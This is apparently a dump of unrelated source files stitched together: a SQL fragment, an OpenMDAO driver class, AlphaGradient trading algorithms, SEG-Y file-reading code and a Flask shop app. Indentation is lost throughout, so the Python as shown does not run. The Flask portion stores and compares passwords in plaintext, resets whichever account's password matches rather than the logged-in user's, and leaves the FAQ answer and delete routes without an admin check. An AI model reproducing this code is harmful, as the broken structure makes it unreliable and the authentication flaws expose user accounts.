and B.edge_id NOT IN (SELECT edge_id FROM railnetworkedges WHERE node_t_id = A.node_id) order by st_distance(A.geom,B.geom) asc limit 1) as dist, A.geom
FROM railnetworknodes as A
'''
read_layer | |
<reponame>jcchin/project_clippy
""" Base class for Driver."""
from collections import OrderedDict
from itertools import chain
from six import iteritems
import numpy as np
from openmdao.core.options import OptionsDictionary
from openmdao.util.record_util import create_local_meta, update_local_meta
class Driver(object):
""" Base class for drivers in OpenMDAO. Drivers can only be placed in a
Problem, and every problem has a Driver. Driver is the simplest driver that
runs (solves using solve_nonlinear) a problem once.
"""
def __init__(self):
super(Driver, self).__init__()
self.recorders = []
# What this driver supports
self.supports = OptionsDictionary(read_only=True)
self.supports.add_option('inequality_constraints', True)
self.supports.add_option('equality_constraints', True)
self.supports.add_option('linear_constraints', False)
self.supports.add_option('multiple_objectives', False)
self.supports.add_option('two_sided_constraints', False)
self.supports.add_option('integer_parameters', False)
# This driver's options
self.options = OptionsDictionary()
self._params = OrderedDict()
self._objs = OrderedDict()
self._cons = OrderedDict()
self._voi_sets = []
# We take root during setup
self.root = None
self.iter_count = 0
def _setup(self, root):
""" Prepares some things we need."""
self.root = root
item_names = ['Parameter', 'Objective', 'Constraint']
items = [self._params, self._objs, self._cons]
for item, item_name in zip(items, item_names):
for name, meta in iteritems(item):
# Check validity of variable
if name not in root.unknowns:
msg = "{} '{}' not found in unknowns."
msg = msg.format(item_name, name)
raise ValueError(msg)
# Size is useful metadata to save
if 'indices' in meta:
meta['size'] = len(meta['indices'])
else:
meta['size'] = root.unknowns.metadata(name)['size']
def _map_voi_indices(self):
poi_indices = {}
qoi_indices = {}
for name, meta in chain(iteritems(self._cons), iteritems(self._objs)):
# set indices of interest
if 'indices' in meta:
qoi_indices[name] = meta['indices']
for name, meta in iteritems(self._params):
# set indices of interest
if 'indices' in meta:
poi_indices[name] = meta['indices']
return poi_indices, qoi_indices
def _of_interest(self, voi_list):
"""Return a list of tuples, with the given voi_list organized
into tuples based on the previously defined grouping of VOIs.
"""
vois = []
done_sets = set()
for v in voi_list:
for voi_set in self._voi_sets:
if voi_set in done_sets:
break
if v in voi_set:
vois.append(tuple([x for x in voi_set
if x in voi_list]))
done_sets.add(voi_set)
break
else:
vois.append((v,))
return vois
def params_of_interest(self):
"""
Returns
-------
list of tuples of str
The list of params, organized into tuples according to previously
defined VOI groups.
"""
return self._of_interest(self._params)
def outputs_of_interest(self):
"""
Returns
-------
list of tuples of str
The list of constraints and objectives, organized into tuples
according to previously defined VOI groups.
"""
return self._of_interest(list(chain(self._objs, self._cons)))
def parallel_derivs(self, vnames):
"""
Specifies that the named variables of interest are to be grouped
together so that their derivatives can be solved for concurrently.
Args
----
vnames : iter of str
The names of variables of interest that are to be grouped.
"""
for grp in self._voi_sets:
for vname in vnames:
if vname in grp:
msg = "'%s' cannot be added to VOI set %s because it " + \
"already exists in VOI set: %s"
raise RuntimeError(msg % (vname, tuple(vnames), grp))
param_intsect = set(vnames).intersection(self._params.keys())
if param_intsect and len(param_intsect) != len(vnames):
raise RuntimeError("%s cannot be grouped because %s are params and %s are not." %
(vnames, list(param_intsect),
list(set(vnames).difference(param_intsect))))
self._voi_sets.append(tuple(vnames))
def add_recorder(self, recorder):
"""
Adds a recorder to the driver.
Args
----
recorder : BaseRecorder
A recorder instance.
"""
self.recorders.append(recorder)
def add_param(self, name, low=None, high=None, indices=None, adder=0.0, scaler=1.0):
"""
Adds a parameter to this driver.
Args
----
name : string
Name of the paramcomp in the root system.
low : float or ndarray, optional
Lower boundary for the param
high : float or ndarray, optional
Upper boundary for the param
indices : iter of int, optional
If a param is an array, these indicate which entries are of
interest for derivatives.
adder : float or ndarray, optional
Value to add to the model value to get the scaled value. Adder
is first in precedence.
scaler : float or ndarray, optional
value to multiply the model value to get the scaled value. Scaler
is second in precedence.
"""
if low is None:
low = -1e99
elif isinstance(low, np.ndarray):
low = low.flatten()
if high is None:
high = 1e99
elif isinstance(high, np.ndarray):
high = high.flatten()
if isinstance(adder, np.ndarray):
adder = adder.flatten()
if isinstance(scaler, np.ndarray):
scaler = scaler.flatten()
# Scale the low and high values
low = (low + adder)*scaler
high = (high + adder)*scaler
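# Illustrative scaling round trip (hypothetical numbers): with adder=-1.0 and scaler=2.0,
# a model value of 3.0 maps to the scaled/driver value (3.0 + (-1.0)) * 2.0 == 4.0
# (see get_params), and set_param inverts it via 4.0 / 2.0 - (-1.0) == 3.0.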
param = {}
param['low'] = low
param['high'] = high
param['adder'] = adder
param['scaler'] = scaler
if indices:
param['indices'] = np.array(indices, dtype=int)
self._params[name] = param
def get_params(self):
""" Returns a dict of parameters.
Returns
-------
dict
Keys are the param object names, and the values are the param
values.
"""
uvec = self.root.unknowns
params = OrderedDict()
for key, meta in iteritems(self._params):
scaler = meta['scaler']
adder = meta['adder']
flatval = uvec.flat[key]
if 'indices' in meta:
# Make sure our indices are valid
try:
flatval = flatval[meta['indices']]
except IndexError:
msg = "Index for parameter '{}' is out of bounds. "
msg += "Requested index: {}, "
msg += "Parameter shape: {}."
raise IndexError(msg.format(key, meta['indices'],
uvec.metadata(key)['shape']))
if isinstance(scaler, np.ndarray) or isinstance(adder, np.ndarray) \
or scaler != 1.0 or adder != 0.0:
params[key] = (flatval + adder)*scaler
else:
params[key] = flatval
return params
def get_param_metadata(self):
""" Returns a dict of parameter metadata.
Returns
-------
dict
Keys are the param object names, and the values are the param
metadata dictionaries.
"""
return self._params
def set_param(self, name, value):
""" Sets a parameter.
Args
----
name : string
Name of the paramcomp in the root system.
val : ndarray or float
value to set the parameter
"""
scaler = self._params[name]['scaler']
adder = self._params[name]['adder']
if isinstance(scaler, np.ndarray) or isinstance(adder, np.ndarray) \
or scaler != 1.0 or adder != 0.0:
self.root.unknowns[name] = value/scaler - adder
else:
self.root.unknowns[name] = value
def add_objective(self, name, indices=None, adder=0.0, scaler=1.0):
""" Adds an objective to this driver.
Args
----
name : string
Promoted pathname of the output that will serve as the objective.
indices : iter of int, optional
If an objective is an array, these indicate which entries are of
interest for derivatives.
adder : float or ndarray, optional
Value to add to the model value to get the scaled value. Adder
is first in precedence.
scaler : float or ndarray, optional
value to multiply the model value to get the scaled value. Scaler
is second in precedence.
"""
if isinstance(adder, np.ndarray):
adder = adder.flatten()
if isinstance(scaler, np.ndarray):
scaler = scaler.flatten()
obj = {}
obj['adder'] = adder
obj['scaler'] = scaler
if indices:
obj['indices'] = indices
if len(indices) > 1 and not self.supports['multiple_objectives']:
raise RuntimeError("Multiple objective indices specified for "
"variable '%s', but driver '%s' doesn't "
"support multiple objectives." %
(name, self.pathname))
self._objs[name] = obj
def get_objectives(self, return_type='dict'):
""" Gets all objectives of this driver.
Args
----
return_type : string
Set to 'dict' to return a dictionary, or set to 'array' to return a
flat ndarray.
Returns
-------
dict (for return_type 'dict')
Key is the objective name string, value is an ndarray with the values.
ndarray (for return_type 'array')
Array containing all objective values in the order they were added.
"""
uvec = self.root.unknowns
objs = OrderedDict()
for key, meta in iteritems(self._objs):
scaler = meta['scaler']
adder = meta['adder']
flatval = uvec.flat[key]
if 'indices' in meta:
# Make sure our indices are valid
try:
flatval = flatval[meta['indices']]
except IndexError:
msg = "Index for objective '{}' is out of bounds. "
msg += "Requested index: {}, "
msg += "Parameter shape: {}."
raise IndexError(msg.format(key, meta['indices'],
uvec.metadata(key)['shape']))
if isinstance(scaler, np.ndarray) or isinstance(adder, np.ndarray) \
or adder != 0.0 or scaler != 1.0:
objs[key] = (flatval + adder)*scaler
else:
objs[key] = flatval
return objs
def add_constraint(self, name, ctype='ineq', linear=False, jacs=None,
indices=None, adder=0.0, scaler=1.0):
""" Adds a constraint to this driver.
Args
----
name : string
Promoted pathname of the output that will serve as the objective.
ctype : string
Set to 'ineq' for inequality constraints, or 'eq' for equality
constraints. Make sure your driver supports the ctype of constraint
that you are adding.
linear : bool, optional
Set to True if this constraint is linear with respect to all params
so that it can be calculated once and cached.
jacs : | |
<reponame>nathanheidacker/AlphaGradient<gh_stars>0
# -*- coding: utf-8 -*-
"""
AlphaGradient's algorithm library is a collection of financial algorithms built
using AlphaGradient. These algorithms are public domain and free to use. We
highly encourage the open-sourcing of algorithms, as it contributes to a
vibrant and lively community and helps others learn. If you've developed an
algorithm using AlphaGradient that you'd like to make publicly available to
all AlphaGradient users, see our page on :ref:`publishing an algorithm <algolib.publish>`.
All of the algorithms contained within the algorithm library are licensed under
the Apache 2.0 license. See `alphagradient.license` for more information.
"""
# Standard Imports
import os
import math
from datetime import datetime, timedelta
# Third Party imports
import numpy as np
# Local Imports
from .. import _proxy as ag
# Typing
from typing import (
Any,
)
class IndexHold(ag.Algorithm):
"""A tutorial algorithm! Buy and Hold!"""
def setup(self, start: datetime, **kwargs: Any) -> ag.Environment:
"""
This algorithm only requires a single index fund to invest in, so it
uses the default AG benchmark SPY. No other assets are instantiated.
Only a single portfolio ("MAIN") is used.
Parameters:
start:
The starting datetime of the backtest is required to properly
setup the environment
"""
# Our initial balance
initial = 1_000_000
spy = ag.Stock("SPY")
# Creating an environment object
env = ag.Environment(assets=[spy])
# identical to env.main.invest(initial)
env.invest(initial)
# Calling this drastically improves runtime performance
env.finalize()
return env
def cycle(self, start: datetime, end: datetime, **kwargs: Any) -> None:
"""
The goals of this algorithm are very simple: buy SPY near the start of the backtest and hold it until the end.
"""
# Buying at the start...
if self.date <= datetime.fromisoformat("2010-01-04 16:00:00"):
# Determining how much we can afford
to_buy = math.floor(self.env.liquid / self.env.stock.spy.value)
# This buys the asset on the main portfolio
self.env.buy(self.env.stock.spy, to_buy)
# And holding till the end!
elif self.date >= (end - timedelta(days=1)):
# Selling everything
self.env.liquidate()
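# A minimal usage sketch (assumes ag.Algorithm instances are callable with start/end keyword
# arguments, as described in TemplateAlgo below; the dates are illustrative only):
#   algo = IndexHold()
#   algo(start=datetime(2010, 1, 4), end=datetime(2015, 1, 4))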
class ThetaGang(ag.Algorithm):
"""
An example algorithm in the algorithm library used to demonstrate some of
AlphaGradient's standard features and best practices
This is a tutorial algorithm that seeks to demonstrate some of AlphaGradient's
features and standard design practices. This algorithm sells the maximum number
of covered calls on SPY that it can, with a bounded strike price to prevent from
selling calls that could lose money when assigned
Here's a breakdown:
#. | At the beginning of the day, buy as many shares of SPY as we can to the
| nearest multiple of 100
#. | Using SPY shares as collateral, sells 1 DTE covered calls on SPY where
| the strike is determined by SPY's current value. The algorithm will never
| sell a call with a strike below its average cost for the shares it owns.
| This prevents it from losing money in the case of call assignment.
#. | The strike bounding component of 2) is toggle-able by instantiating with
| bounded=False
"""
def __init__(self, *args: Any, bounded: bool = True, **kwargs: Any) -> None:
super().__init__(*args, **kwargs)
# Determines whether or not a lower bound should be placed on the strike
self.bounded = bounded
def setup(self, start: datetime, **kwargs: Any) -> ag.Environment:
"""This is the environement setup that is performed before each backtest. Must return an environment object"""
# Creating a basket with the given start parameter
env = ag.Environment()
# Creating SPY stock, attaching it to self (will be referenced frequently)
# This call to the stock() method both instantiates the stock within the environment, AND returns it
self.spy = env.stock("SPY")
# Creating the stock normally like so:
# self.spy = ag.finance.Stock("SPY")
# will NOT allow the environment to track it or update its value data as time progresses
# Initial investment into the primary portfolio
env.invest(self.spy.value * 150)
# We only want the algorithm to evaluate at market open and close of each day
# Finalizing will dramatically increase execution time, but is not necessary
env.finalize(manual=["9:30 AM", "4:00 PM"])
return env
def cycle(self, **kwargs: Any) -> None:
"""The actions to perform at every valuation point"""
# Selling as many covered calls on SPY as we can
self.env.covered_call(self.generate_call())
# The above line of code is a shortcut for:
# self.env.main.covered_call(self.generate_call())
# Showing the changes at every time step
self.print(self.stats.change_report())
def generate_call(self, delta: float = 1) -> ag.Call:
"""Generates the ideal SPY call to be sold based on current circumstances"""
# Getting our current position in the Asset <STOCK SPY>
spy_position = self.env.get_position(self.spy)
# Determining our optimal strike price
optimal = math.floor(self.spy.value) + delta
# Determining a lower bound for our strike price (the ceiling of our basis)
lower_bound = optimal
if spy_position and self.bounded:
lower_bound = math.ceil(spy_position.average_cost)
# Determining our strike price
strike = max(optimal, lower_bound)
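# Worked example with hypothetical numbers: SPY at 450.30 and delta=1 gives
# optimal = floor(450.30) + 1 == 451; if the position's average cost is 452.10,
# lower_bound = ceil(452.10) == 453, so the call is sold at strike max(451, 453) == 453,
# which keeps assignment at or above cost basis when bounded=True.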
# Determining the call expiry date (1 DTE)
expiry = self.env.date + timedelta(days=1)
# We can't sell calls with expiries on weekends or outside of market hours
expiry = ag.utils.nearest_expiry(expiry)
# Creating the call using the environment so that it doesn't have to be added retroactively
return self.env.call(self.spy, strike, expiry)
class TemplateAlgo(ag.Algorithm):
"""
Shows how to create and document an AlphaGradient algorithm
This section of the algorithm should contain documentation about what the
algorithm aims to accomplish in general, the theory that it operates on in
order to accomplish those aims, as well as important implementation details
on how specifically this algorithm models that theory.
Docstrings for classes, functions, properties, and attributes alike should
follow standard rst, google, or numpy docstring formats such that they are
compatible with sphinx autodocumentation
The primary docstring for the algorithm should also document its __init__
function if it has been overridden. Include a parameters section inside
the class docstring for parameters taken in for __init__.
All Algorithms seeking publication should be properly type annotated.
Parameters:
template_requires:
An example of a parameter that an algorithm may require during
instantiation to initialize some class setting or control behavior.
This example sets a private attribute that underlies the function
of the algorithm's 'template_property' property. This is a fairly
standard use case.
"""
def __init__(self, *args: Any, template_requires: Any, **kwargs: Any) -> None:
"""
Shows how to create and document an __init__ function for an algorithm
Documentation for init functions in algorithms should be included in the
algorithm's main docstring below the class definition. Be sure to
document all new parameters thoroughly, as well as any extra
initialization behavior. Docstrings for __init__, as well as other
dunder methods, are not required unless they perform unexpected
behavior.
"""
self._prop = template_requires
super().__init__(*args, **kwargs)
def setup(self, **kwargs: Any) -> ag.Environment:
"""
Shows how to create and document a setup function
The setup function should be capable of accepting 'start' and 'end'
keyword arguments, so if you don't accept those directly, you must
accept **kwargs. They will additionally be passed any arguments that
are passed to the algorithm's __call__ method.
Setup functions should always return an environment object which will be
bound to the Algorithm's 'env' attribute. This occurs when the
algorithm is instantiated, as well as before every backtest.
Documentation for setup functions should primarily concern what kind
of environment is being set up, and why the instantiated assets are
required. Why are certain assets or asset classes being used? How
does the algorithm take advantage of them? If there are multiple
portfolios in the environment, why, and what is the purpose of each one?
Questions like this should be answerable from a reading the setup
docstring.
Parameters:
example:
Include any additional parameters required by the setup function
in their own parameters section, using this format.
"""
return ag.Environment()
def cycle(self, **kwargs: Any) -> None:
"""
Shows how to create and document a cycle function
The cycle function should be capable of accepting 'start' and 'end'
keyword arguments, so if you don't accept those directly, you must
accept **kwargs. They will additionally be passed any arguments that
are passed to the algorithm's __call__ method.
Cycle functions should have no return value; their goal is to modify the
Algorithm's | |
longer ' + \
'than 3200 bytes'
raise SEGYWritingError(msg)
# Assert the encoding.
enc = self.textual_header_encoding.upper()
# Make sure revision number and end header marker are present. If
# not: add them - if something else is already present, raise a
# warning but don't do anything.
# Make sure the textual header has the required fields.
revision_number = textual_header[3200-160:3200-146].decode()
end_header_mark = textual_header[3200-80:3200-58]
if revision_number != "C39 SEG Y REV1":
if revision_number.strip() in ("", "C", "C39"):
textual_header = textual_header[:3200-160] + \
b"C39 SEG Y REV1" + textual_header[3200-146:]
else:
# Raise warning but don't do anything.
msg = ("The revision number in the textual header should be "
"set as 'C39 SEG Y REV1' for a fully valid SEG-Y "
"file. It is set to '%s' which will be written to the "
"file. Please change it if you want a fully valid file."
% revision_number)
warnings.warn(msg, SEGYInvalidTextualHeaderWarning)
desired_end_header_mark = b"C40 END TEXTUAL HEADER" if enc == "ASCII" \
else b"C40 END EBCDIC "
if end_header_mark != desired_end_header_mark:
if end_header_mark.strip() in (b"", b"C", b"C40"):
textual_header = textual_header[:3200-80] + \
desired_end_header_mark + textual_header[3200-58:]
else:
# Raise warning but don't do anything.
msg = ("The end header mark in the textual header should be "
"set as 'C40 END TEXTUAL HEADER' or as "
"'C40 END EBCDIC ' for a fully valid "
"SEG-Y file. It is set to '%s' which will be written "
"to the file. Please change it if you want a fully "
"valid file."
% end_header_mark.decode())
warnings.warn(msg, SEGYInvalidTextualHeaderWarning)
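# Offset arithmetic for the two checks above: bytes 3040:3054 (3200-160 to 3200-146) hold the
# 14-byte revision card "C39 SEG Y REV1", and bytes 3120:3142 (3200-80 to 3200-58) hold the
# 22-byte end-header card, e.g. "C40 END TEXTUAL HEADER".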
# Finally encode the header if necessary.
if enc == 'ASCII':
pass
elif enc == 'EBCDIC':
textual_header = \
textual_header.decode('ascii').encode('EBCDIC-CP-BE')
# Should not happen.
else:
msg = 'self.textual_header_encoding has to be either ASCII or ' + \
'EBCDIC.'
raise SEGYWritingError(msg)
file.write(textual_header)
def _read_traces(self, unpack_headers=False, headonly=False,
yield_each_trace=False):
"""
Reads the actual traces starting at the current file pointer position
to the end of the file.
:type unpack_headers: bool
:param unpack_headers: Determines whether or not all headers will be
unpacked during reading the file. Has a huge impact on the memory
usage and the performance. They can be unpacked on-the-fly after
being read. Defaults to False.
:type headonly: bool
:param headonly: Determines whether or not the actual data records
will be read and unpacked. Has a huge impact on memory usage. Data
will not be unpackable on-the-fly after reading the file.
Defaults to False.
:type yield_each_trace: bool
:param yield_each_trace: If True, it will yield each trace after it
has been read. This enables a simple implementation of a
streaming interface to read SEG-Y files. Read traces will no
longer be collected in ``self.traces`` list if this is set to
``True``.
"""
self.traces = []
# Determine the filesize once.
if isinstance(self.file, io.BytesIO):
pos = self.file.tell()
self.file.seek(0, 2)  # go to end of file
filesize = self.file.tell()
self.file.seek(pos, 0)
else:
filesize = os.fstat(self.file.fileno())[6]
# Big loop to read all data traces.
while True:
# Read and as soon as the trace header is too small abort.
try:
trace = SEGYTrace(self.file, self.data_encoding, self.endian,
unpack_headers=unpack_headers,
filesize=filesize, headonly=headonly)
if yield_each_trace:
yield trace
else:
self.traces.append(trace)
except SEGYTraceHeaderTooSmallError:
break
class SEGYBinaryFileHeader(object):
"""
Parses the binary file header at the given starting position.
"""
def __init__(self, header=None, endian='>'):
"""
"""
self.endian = endian
if header is None:
self._create_empty_binary_file_header()
return
self._read_binary_file_header(header)
def _read_binary_file_header(self, header):
"""
Reads the binary file header and stores every value in a class
attribute.
"""
pos = 0
for item in BINARY_FILE_HEADER_FORMAT:
length, name, _ = item
string = header[pos: pos + length]
pos += length
# Unpack according to different lengths.
if length == 2:
format = ('%sh' % self.endian).encode('ascii', 'strict')
# Set the class attribute.
setattr(self, name, unpack(format, string)[0])
# Update: Seems to be correct. Two's complement integers seem to be
# the common way to store integer values.
elif length == 4:
format = ('%si' % self.endian).encode('ascii', 'strict')
# Set the class attribute.
setattr(self, name, unpack(format, string)[0])
# The other value are the unassigned values. As it is unclear how
# these are formatted they will be stored as strings.
elif name.startswith('unassigned'):
# These are only the unassigned fields.
format = 'h' * (length // 2)
# Set the class attribute.
setattr(self, name, string)
# Should not happen.
else:
raise Exception
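# Unpacking sketch for the loop above (illustrative bytes): with endian '>' a 2-byte field
# uses format b'>h' and a 4-byte field uses b'>i', so e.g.
#   unpack(b'>i', b'\x00\x00\x0b\xb8')[0] == 3000
# which is how, for example, a sample-interval field would be decoded.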
def __str__(self):
"""
Convenience method to print the binary file header.
"""
final_str = ["Binary File Header:"]
for item in BINARY_FILE_HEADER_FORMAT:
final_str.append("\t%s: %s" % (item[1],
str(getattr(self, item[1]))))
return "\n".join(final_str)
def _repr_pretty_(self, p, cycle):
p.text(str(self))
def write(self, file, endian=None):
"""
Writes the header to an open file like object.
"""
if endian is None:
endian = self.endian
for item in BINARY_FILE_HEADER_FORMAT:
length, name, _ = item
# Unpack according to different lengths.
if length == 2:
format = ('%sh' % endian).encode('ascii', 'strict')
# Write to file.
file.write(pack(format, getattr(self, name)))
# Update: Seems to be correct. Two's complement integers seem to be
# the common way to store integer values.
elif length == 4:
format = ('%si' % endian).encode('ascii', 'strict')
# Write to file.
file.write(pack(format, getattr(self, name)))
# These are the two unassigned values in the binary file header.
elif name.startswith('unassigned'):
temp = getattr(self, name)
if not isinstance(temp, bytes):
temp = str(temp).encode('ascii', 'strict')
temp_length = len(temp)
# Pad to desired length if necessary.
if temp_length != length:
temp += b'\x00' * (length - temp_length)
file.write(temp)
# Should not happen.
else:
raise Exception
def _create_empty_binary_file_header(self):
"""
Just fills all necessary class attributes with zero.
"""
for _, name, _ in BINARY_FILE_HEADER_FORMAT:
setattr(self, name, 0)
class SEGYTrace(object):
"""
Convenience class that internally handles a single SEG Y trace.
"""
def __init__(self, file=None, data_encoding=4, endian='>',
unpack_headers=False, filesize=None, headonly=False):
"""
Convenience class that internally handles a single SEG Y trace.
:param file: Open file like object with the file pointer of the
beginning of a trace. If it is None, an empty trace will be
created.
:param data_encoding: The data sample format code as defined in the
binary file header:
1:
4 byte IBM floating point
2:
4 byte Integer, two's complement
3:
2 byte Integer, two's complement
4:
4 byte Fixed point with gain
5:
4 byte IEEE floating point
8:
1 byte Integer, two's complement
Defaults to 4.
:type endian: str
:param endian: The byte order of the trace, '>' for big endian and
'<' for little endian.
:type unpack_headers: bool
:param unpack_headers: Determines whether or not all headers will be
unpacked during reading the file. Has a huge impact on the memory
usage and the performance. They can be unpacked on-the-fly after
being read. Defaults to False.
:type filesize: int
:param filesize: Filesize of the file. If not given it will be
determined using fstat which is slow.
:type headonly: bool
:param headonly: Determines whether or not the actual data records
will be read and unpacked. Has a huge impact on memory usage. Data
will not be unpackable on-the-fly after reading the file.
Defaults to False.
"""
self.endian = endian
self.data_encoding = data_encoding
# If None just return empty structure.
if file is None:
self._create_empty_trace()
return
self.file = file
# Set the filesize if necessary.
if filesize:
self.filesize = filesize
else:
if isinstance(self.file, io.BytesIO):
_pos = self.file.tell()
self.file.seek(0, 2)
self.filesize = self.file.tell()
self.file.seek(_pos)
else:
self.filesize = os.fstat(self.file.fileno())[6]
# Otherwise read the file.
self._read_trace(unpack_headers=unpack_headers, headonly=headonly)
def _read_trace(self, unpack_headers=False, headonly=False):
"""
Reads the complete next header starting at the file pointer at
self.file.
:type unpack_headers: bool
:param unpack_headers: Determines whether or not all headers will be
unpacked during reading the file. Has a huge impact on the memory
usage and the performance. They can be unpacked on-the-fly after
being read. Defaults to False.
:type headonly: bool
:param headonly: Determines whether or not the actual data records
will be read and unpacked. Has a huge impact on memory usage. Data
will not be unpackable on-the-fly after reading the | |
if session['admin_logged_in']:
customer_dict = {}
db = shelve.open('CustomerStorage.db', 'c')
session['username'] = "Admin"
try:
customer_dict = db['Customers']
print("For Programmer: SUCCESS --> Success in retrieving Customers from CustomerStorage.db")
except:
print("For Programmer: ERROR --> Error in retrieving Customers from CustomerStorage.db")
db.close()
customer_list = []
if customer_dict:
for key in customer_dict:
customer = customer_dict.get(key)
customer_list.append(customer)
return render_template('customerAccount.html', count=len(customer_list), customer_list=customer_list)
else:
print("For Programmer: INFORMATION --> There are zero records")
return render_template('customerAccount.html', count=0)
except:
print("For Programmer: THREAT --> Someone is trying to break the system")
return redirect(url_for('error_render'))
# <--- End of Admin Account Management --->
# <--- Start of Customer Forget Password --->
@app.route('/forgetPassword', methods=['GET', 'POST'])
def forget_password():
forget_password_form = ForgetPasswordForm(request.form)
if request.method == 'POST' and forget_password_form.validate():
customer_dict = {}
db = shelve.open('CustomerStorage.db', 'c')
try:
customer_dict = db['Customers']
print("For Programmer: SUCCESS --> Success in retrieving Customers from CustomerStorage.db")
except:
print("For Programmer: ERROR --> Error in retrieving Customers from CustomerStorage.db")
if customer_dict:
for key in customer_dict:
email = customer_dict[key].get_email()
firstname = customer_dict[key].get_firstName()
lastname = customer_dict[key].get_lastName()
# Email Validation (Check if email entered is in records)
if email == forget_password_form.email.data:
new_password = Email.Email(email, firstname, lastname)
customer_dict[key].set_password(new_password)
print('For Programmer: SUCCESS --> Password has been successfully changed')
# Set to true so that user will have to reset their password
customer_dict[key].set_reset_pass(True)
db['Customers'] = customer_dict
success = "An email have been sent to {}".format(forget_password_form.email.data)
return render_template('forgetPassword.html', form=forget_password_form, success=success)
else:
print("For Programmer: Invalid email")
error = "Invalid Email"
return render_template('forgetPassword.html', form=forget_password_form, error=error)
else:
# If dictionary was empty
print("For Programmer: ERROR --> No record found")
error = "Invalid Email"
return render_template('forgetPassword.html', form=forget_password_form, error=error)
db.close()
return render_template('forgetPassword.html', form=forget_password_form)
# <--- End of Customer Forget Password --->
# <--- Start of Customer Reset Password --->
@app.route('/resetPassword', methods=['GET', 'POST'])
def reset_password():
try:
if session['logged_in']:
reset_password_form = ResetPasswordForm(request.form)
if request.method == 'POST' and reset_password_form.validate():
customer_dict = {}
db = shelve.open('CustomerStorage.db', 'c')
try:
customer_dict = db['Customers']
print("For Programmer: SUCCESS --> Success in retrieving Customers from CustomerStorage.db")
except:
print("For Programmer: ERROR --> Error in retrieving Customers from CustomerStorage.db")
for key in customer_dict:
password = customer_dict[key].get_password()
new_password = reset_password_form.confirm_password.data
# Current password validation (Check if current password entered by user matches in dictionary)
if password == reset_password_form.current_password.data:
customer_dict[key].set_password(new_password)
customer_dict[key].set_reset_pass(False)
db['Customers'] = customer_dict
print("For Programmer: SUCCESS --> {} password has been changed".format(customer_dict[key].get_username()))
success = "Your password has been changed"
return redirect(url_for('customer_profile', success=success))
else:
print("For Programmer: ERROR --> Invalid Password")
error = "Invalid Password"
return render_template('resetPassword.html', form=reset_password_form, error=error)
return render_template('resetPassword.html', form=reset_password_form)
except:
print("For Programmer: THREAT --> Someone is trying to break the system")
return redirect(url_for('error_render'))
# <--- End of Customer Reset Password --->
# <------------------------------------------------------->
# <------------------ FAQ (Arif's Code) ------------------>
# <------------------------------------------------------->
@app.route('/FAQ', methods=['GET', 'POST'])
def faq():
faq_dict = {}
create_faq_form = CreateFaqForm(request.form)
try:
db = shelve.open('storage.db',
'c')  # argument is 'c', so the file is guaranteed to be created if missing (see the KeyError handling below)
faq_dict = db["FAQ"]
except KeyError:
print("Error in retrieving storage.db, recreating storage.db.")
# Function below used multiple times, only for translation of data
def displayers(faq_dict_func):
q_list = []
u_count = 0
a_count = 0
for key in faq_dict_func:
question = faq_dict_func.get(key)
q_list.append(question)
if question.get_answer() == '':
u_count += 1
else:
a_count += 1
return q_list, u_count, a_count
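# Example of the helper's contract (hypothetical data): for three stored FAQ objects of which
# one has an empty answer, displayers(faq_dict) returns ([q1, q2, q3], 1, 2),
# i.e. the question list, the unanswered count, and the answered count.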
if request.method == 'POST' and create_faq_form.validate():
if create_faq_form.question.data != '' and create_faq_form.answer.data == '':
faq_details = FAQ.FAQ(create_faq_form.question.data, session['username'])
faq_dict[faq_details.get_id()] = faq_details
create_faq_form.question.data = ''
db['FAQ'] = faq_dict
faq_dict = db['FAQ']
try:
faq = faq_dict[faq_details.get_id()]
print("\"" + str(faq.get_question()) + "\" question was stored in storage.db successfully with id ==",
faq.get_id())
except KeyError:
error = "Question failed to upload (KeyError). Log out and sign in again"
print("KeyError in retrieving latest input, likely it was blank. This error is expected.")
question_list, unanswered_count, answered_count = displayers(faq_dict)
return render_template("faq.html", form=create_faq_form, count=len(question_list),
question_list=question_list,
unanswered_count=unanswered_count,
answered_count=answered_count,
error=error)
except UnboundLocalError:
error = "Question failed to upload (UnboundLocalError). Log out and sign in again"
print("UnboundLocalError in retrieving latest input, likely it was blank. This error is expected.")
question_list, unanswered_count, answered_count = displayers(faq_dict)
return render_template("faq.html", form=create_faq_form, count=len(question_list),
question_list=question_list,
unanswered_count=unanswered_count,
answered_count=answered_count,
error=error)
else:
success = 'Your question has been uploaded! The admins will upload their answer soon within the week!'
question_list, unanswered_count, answered_count = displayers(faq_dict)
return render_template("faq.html", form=create_faq_form, count=len(question_list),
question_list=question_list,
unanswered_count=unanswered_count,
answered_count=answered_count,
success=success)
question_list, unanswered_count, answered_count = displayers(faq_dict)
db.close()
return render_template("faq.html", form=create_faq_form, count=len(question_list),
question_list=question_list,
unanswered_count=unanswered_count,
answered_count=answered_count)
# <--- End of FAQ Display page with form --->
# <--- Start of FAQ answering page with form, for admin --->
@app.route('/FAQanswering/<int:id>/', methods=['GET', 'POST'])
def faqanswering(id):
faq_answer = CreateFaqForm(request.form)
if request.method == 'POST' and faq_answer.validate():
faq_dict = {}
db = shelve.open('storage.db', 'w')
faq_dict = db['FAQ']
faq = faq_dict.get(id)
# print(type(faq))
# print(faq)
faq.set_question(faq_answer.question.data)
faq.set_answer(faq_answer.answer.data)
db['FAQ'] = faq_dict
db.close()
return redirect(url_for('faq'))
else:
faq_dict = {}
db = shelve.open('storage.db', 'r')
faq_dict = db['FAQ']
db.close()
faq = faq_dict.get(id)
faq_answer.question.data = faq.get_question()
faq_answer.answer.data = faq.get_answer()
return render_template('faq_answering.html', form=faq_answer)
# <--- End of FAQ answering page with form, for admin --->
# <--- Start of FAQ deletion page, for admin --->
@app.route("/FAQdelete/<int:id>/", methods=['POST'])
def faqdelete(id):
faq_dict = {}
db = shelve.open("storage.db", 'w')
faq_dict = db["FAQ"]
faq = faq_dict.pop(id)
db['FAQ'] = faq_dict
db.close()
return redirect(url_for("faq"))
# <--- End of FAQ deletion page, for admin --->
# <------------------------------------------------------->
# <---------------------- <NAME> ----------------------->
# <------------------------------------------------------->
# StoreManage ViewProductStore
@app.route('/storeManage')
def store_manage():
print('load', flush=True)
db = shelve.open('ProductStorage.db', 'c')
try:
products_dict = db['Products']
except KeyError:
print('error retrieving products dict')
products_dict = {}
print(products_dict, flush=True)
products_list = []
for key in products_dict:
print(key, flush=True)
product = products_dict[key]
products_list.append(product)
print(product, flush=True)
print(products_list, flush=True)
return render_template('storeManage/storeManage.html', products_list=products_list)
# UploadProduct
@app.route('/uploadProduct', methods=['GET', 'POST'])
def upload_product():
print('upload', flush=True)
form = Createproduct()
Uploadfield = Uploadimage()
# form.validate()
# print(form.errors.items())
